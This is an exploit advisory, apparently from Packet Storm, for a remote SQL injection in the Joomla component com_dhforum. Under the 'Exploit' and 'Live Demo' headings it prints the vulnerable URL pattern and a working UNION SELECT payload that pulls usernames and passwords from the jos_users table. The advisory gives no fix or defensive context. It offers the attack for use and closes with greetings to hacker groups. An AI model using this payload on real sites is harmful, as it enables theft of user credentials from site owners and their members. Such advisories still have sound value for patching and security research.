The Joomla DHForum suffers from a remote SQL injection vulnerability.
a990e32d2fed4c5eacafa0ccba0696b4==============================================================================
======
[»] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================
======
[»] Script: [ joomla Component ]
[»] Language: [ PHP ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[»] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]
===[ Live Demo ]===
[»] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat
(username,0x3a,password)+from+jos_users--
Author: ViRuSMaN <-
###########################################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!